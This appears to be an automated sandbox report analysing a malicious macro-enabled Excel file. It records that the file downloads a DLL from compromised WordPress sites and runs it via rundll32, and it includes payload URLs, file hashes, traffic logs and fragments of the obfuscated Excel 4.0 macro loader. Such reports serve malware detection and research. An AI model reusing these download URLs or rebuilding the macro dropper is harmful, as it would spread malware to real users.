            http://schemas.openEXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            unknown
            http://sadabahar.com.nEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.duoyuhudong.cn/wp-content/we8xi/TEXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://sadabahar.cEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.duoyuhudong.cn/wp-content/we8xi/REXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://sadabahar.comEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpfalse
              high
              http://sadabahar.coEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sadEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://investor.msn.com/EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpfalse
                high
                http://sadabahar.com.np/wEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://sadabahar.com.np/wp-incEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/pEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                47.96.4.95
                www.duoyuhudong.cnChina
                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                194.233.67.242
                sadabahar.com.npGermany
                6659NEXINTO-DEfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532947
                Start date:02.12.2021
                Start time:21:21:24
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 36s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:sin t#U00edtulo_0212.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winXLSM@8/7@2/2
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:
                • Successful, ratio: 6.6% (good quality ratio 6.3%)
                • Quality average: 70.9%
                • Quality standard deviation: 25.3%
                HCA Information:
                • Successful, ratio: 53%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                • TCP Packets have been reduced to 100
                • Execution Graph export aborted for target EXCEL.EXE, PID 2580 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                21:21:57API Interceptor420x Sleep call for process: svchost.exe modified
                21:23:57API Interceptor10x Sleep call for process: rundll32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                47.96.4.95DOC-0212.xlsmGet hashmaliciousBrowse
                • www.duoyuhudong.cn/wp-content/we8xi/
                194.233.67.242DOC-0212.xlsmGet hashmaliciousBrowse
                • sadabahar.com.np/wp-includes/pUMqITCt83a/

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                sadabahar.com.npDOC-0212.xlsmGet hashmaliciousBrowse
                • 194.233.67.242
                www.duoyuhudong.cnDOC-0212.xlsmGet hashmaliciousBrowse
                • 47.96.4.95

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                NEXINTO-DEsk4e7kDlkb.exeGet hashmaliciousBrowse
                • 194.195.211.98
                DOC-0212.xlsmGet hashmaliciousBrowse
                • 194.233.67.242
                REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                • 194.163.155.54
                Sz4lxTmH7r.exeGet hashmaliciousBrowse
                • 194.195.211.98
                YjKK5XYBzBGet hashmaliciousBrowse
                • 212.229.116.92
                setup_x86_x64_install.exeGet hashmaliciousBrowse
                • 194.195.211.98
                nkXzJnW7AH.exeGet hashmaliciousBrowse
                • 194.195.211.98
                sora.arm7Get hashmaliciousBrowse
                • 195.179.208.175
                kq5Of3SOMZ.exeGet hashmaliciousBrowse
                • 194.195.211.98
                zMvP34LhcZ.exeGet hashmaliciousBrowse
                • 194.163.158.120
                KKveTTgaAAsecNNaaaa.arm7-20211122-0650Get hashmaliciousBrowse
                • 212.228.109.42
                lessie.armGet hashmaliciousBrowse
                • 194.195.1.105
                CVfKJhwYQW.exeGet hashmaliciousBrowse
                • 194.195.211.98
                CVfKJhwYQW.exeGet hashmaliciousBrowse
                • 194.195.211.98
                fXlJhe5OGb.exeGet hashmaliciousBrowse
                • 194.195.211.98
                pQdDcGbFWFGet hashmaliciousBrowse
                • 212.228.240.244
                111821 New Order_xlxs.exeGet hashmaliciousBrowse
                • 194.195.211.98
                e7sNr2qu79.exeGet hashmaliciousBrowse
                • 194.195.211.98
                X9dXlHMc21Get hashmaliciousBrowse
                • 212.228.240.243
                PO-No 243563746 Sorg.exeGet hashmaliciousBrowse
                • 194.233.74.163
                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdDOC-0212.xlsmGet hashmaliciousBrowse
                • 47.96.4.95
                sys.exeGet hashmaliciousBrowse
                • 8.189.23.166
                qu1wfRmk6zGet hashmaliciousBrowse
                • 121.197.249.173
                xPj5d9l2QgGet hashmaliciousBrowse
                • 47.107.174.88
                biKMh38rahGet hashmaliciousBrowse
                • 42.121.223.186
                BX67S7KlgCGet hashmaliciousBrowse
                • 47.117.15.214
                d2REPCiUoqGet hashmaliciousBrowse
                • 8.175.9.99
                MTjXit7IJnGet hashmaliciousBrowse
                • 39.100.172.144
                MA4UA3e5xeGet hashmaliciousBrowse
                • 47.122.243.140
                9XtX9oou5YGet hashmaliciousBrowse
                • 120.77.138.115
                7EohYs6rg9Get hashmaliciousBrowse
                • 8.132.148.58
                rIiLBFxqPWGet hashmaliciousBrowse
                • 118.31.165.111
                buiodawbdawbuiopdw.arm7Get hashmaliciousBrowse
                • 101.133.52.203
                buiodawbdawbuiopdw.x86Get hashmaliciousBrowse
                • 47.101.55.154
                Db89KMtOpLGet hashmaliciousBrowse
                • 114.215.209.10
                k7L2CA2IN0Get hashmaliciousBrowse
                • 114.55.154.126
                txAfyNjwr9Get hashmaliciousBrowse
                • 8.182.179.241
                WzwJmknZ2GGet hashmaliciousBrowse
                • 8.188.217.86
                45ijGj4CVnGet hashmaliciousBrowse
                • 8.129.243.129
                armGet hashmaliciousBrowse
                • 8.142.57.223

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):460288
                Entropy (8bit):7.16005344899477
                Encrypted:false
                SSDEEP:6144:31v9X/WHuR1R0bB5HKg0EWBe0uCvn7DOPnAOEiZ9uxc16uoSr4j7G63up9A2:31J/WHlN5HKcWEMn70oxnuF+jKx
                MD5:0339BDFB9A44182933A6E2BE62A49FC5
                SHA1:F81683BF2CC1C83BEBB2786C87EEB8C7FF02AC22
                SHA-256:60CE870E3BD5F6F8BBCEB839C3E369195E7451EDE76665C4D69B526BF1E98C1D
                SHA-512:E8B3EC6FF6CCCFF84138663ED921056A958B8902E5F1C753CF5E20B442433DC131A14C70F7DE0B808382C1204679513927819E6CCA0A0B19231180B29944F7A9
                Malicious:true
                Reputation:low
                IE Cache URL:http://www.duoyuhudong.cn/wp-content/we8xi/
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l.I.l.I.l.I...H.l.I...Hql.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I.l.I7l.IY..H.l.IY..H.l.IY.xI.l.I.l.I.l.IY..H.l.IRich.l.I........PE..L...f..a...........!.....v..........NK.......................................@.......-....@.................................P...........H*.......................,...................................V..@............................................text....u.......v.................. ..`.rdata...............z..............@..@.data....#..........................@....rsrc...H*.......,..................@..@.reloc...,..........................@..B........................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30817388.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                Category:dropped
                Size (bytes):14200
                Entropy (8bit):7.855440184003825
                Encrypted:false
                SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                MD5:4FE798EE522800691796BC9446918C90
                SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                Malicious:false
                Reputation:low
                Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                C:\Users\user\AppData\Local\Temp\CC15.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):1536
                Entropy (8bit):1.1464700112623651
                Encrypted:false
                SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\~DF20EA52A1DD92E798.TMP
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$sin t#U00edtulo_0212.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):165
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                MD5:797869BB881CFBCDAC2064F92B26E46F
                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\user\besta.ocx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):460288
                Entropy (8bit):7.16005344899477
                Encrypted:false
                SSDEEP:6144:31v9X/WHuR1R0bB5HKg0EWBe0uCvn7DOPnAOEiZ9uxc16uoSr4j7G63up9A2:31J/WHlN5HKcWEMn70oxnuF+jKx
                MD5:0339BDFB9A44182933A6E2BE62A49FC5
                SHA1:F81683BF2CC1C83BEBB2786C87EEB8C7FF02AC22
                SHA-256:60CE870E3BD5F6F8BBCEB839C3E369195E7451EDE76665C4D69B526BF1E98C1D
                SHA-512:E8B3EC6FF6CCCFF84138663ED921056A958B8902E5F1C753CF5E20B442433DC131A14C70F7DE0B808382C1204679513927819E6CCA0A0B19231180B29944F7A9
                Malicious:true
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l.I.l.I.l.I...H.l.I...Hql.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I.l.I7l.IY..H.l.IY..H.l.IY.xI.l.I.l.I.l.IY..H.l.IRich.l.I........PE..L...f..a...........!.....v..........NK.......................................@.......-....@.................................P...........H*.......................,...................................V..@............................................text....u.......v.................. ..`.rdata...............z..............@..@.data....#..........................@....rsrc...H*.......,..................@..@.reloc...,..........................@..B........................................................................................................................................................................................................................................................................................
                C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)
                Process:C:\Windows\SysWOW64\rundll32.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):460288
                Entropy (8bit):7.16005344899477
                Encrypted:false
                SSDEEP:6144:31v9X/WHuR1R0bB5HKg0EWBe0uCvn7DOPnAOEiZ9uxc16uoSr4j7G63up9A2:31J/WHlN5HKcWEMn70oxnuF+jKx
                MD5:0339BDFB9A44182933A6E2BE62A49FC5
                SHA1:F81683BF2CC1C83BEBB2786C87EEB8C7FF02AC22
                SHA-256:60CE870E3BD5F6F8BBCEB839C3E369195E7451EDE76665C4D69B526BF1E98C1D
                SHA-512:E8B3EC6FF6CCCFF84138663ED921056A958B8902E5F1C753CF5E20B442433DC131A14C70F7DE0B808382C1204679513927819E6CCA0A0B19231180B29944F7A9
                Malicious:false
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l.I.l.I.l.I...H.l.I...Hql.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I.l.I7l.IY..H.l.IY..H.l.IY.xI.l.I.l.I.l.IY..H.l.IRich.l.I........PE..L...f..a...........!.....v..........NK.......................................@.......-....@.................................P...........H*.......................,...................................V..@............................................text....u.......v.................. ..`.rdata...............z..............@..@.data....#..........................@....rsrc...H*.......,..................@..@.reloc...,..........................@..B........................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.6274713659027045
                TrID:
                • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                • ZIP compressed archive (8000/1) 8.08%
                File name:sin t#U00edtulo_0212.xlsm
                File size:38175
                MD5:382f6c1c7508996537bfd33fc5e884af
                SHA1:5143a3cce279c8e70c7a2aa366a78b2583de9025
                SHA256:5d0311243534a50b4fffa6bb32a952f86e51194d372741b30dbea12c51eb4c44
                SHA512:e285dee02c42c7ff8556c397a2d79055664c7f9412461f69160b80c7dd764b497241fabea9a4520404253b69944875e6ea6183e27829ac3a64b9b8cfeeab433f
                SSDEEP:768:E/I83bP2rjevZCwVIHkvxmUxjfC30+kS4QyoO0VIXlvjyh:EnaIIHkvxXYk4pTVIt2
                File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "sin t#U00edtulo_0212.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                4,7,=CHAR('Ss1'!E45)
                11,1,o
                
                1,5,L
                11,1,=CHAR('Ss1'!N43)
                
                2,0,r
                10,4,=CHAR('Ss1'!D39)
                
                1,8,C
                12,3,=CHAR('Ss1'!S46)
                
                1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)
                
                2,7,=
                8,2,=CHAR('Ss1'!G40)
                
                1,2,A
                7,8,=CHAR('Ss1'!J39)
                
                2,6,=CHAR('Ss1'!R41)
                9,1,e
                

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 21:22:19.400301933 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:19.579179049 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:19.579366922 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:19.580261946 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:19.758667946 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.056572914 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.056632042 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.056668043 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.056699038 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.056775093 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.056937933 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.058176994 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.058223963 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.066170931 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.066210985 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.066323042 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.068236113 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.074711084 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.074740887 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.074765921 CET8049165194.233.67.242192.168.2.22
                Dec 2, 2021 21:22:20.074850082 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.074873924 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.074877024 CET4916580192.168.2.22194.233.67.242
                Dec 2, 2021 21:22:20.330173016 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.585448980 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.585527897 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.586219072 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.841269016 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848328114 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848359108 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848383904 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848409891 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848434925 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848459959 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848476887 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848496914 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848521948 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848546982 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:20.848623037 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.848681927 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.848691940 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.848700047 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:20.860497952 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.103744030 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.103775024 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.103797913 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.103857040 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.103882074 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.103982925 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104007959 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104032993 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104037046 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.104067087 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.104099035 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104114056 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.104123116 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104140997 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.104146957 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104166031 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.104187012 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.104218006 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.107207060 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359292030 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359345913 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359400034 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359440088 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359476089 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359513998 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359536886 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359553099 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359590054 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359591961 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359617949 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359632015 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359663010 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359668970 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359710932 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359714031 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359745026 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359750986 CET804916647.96.4.95192.168.2.22
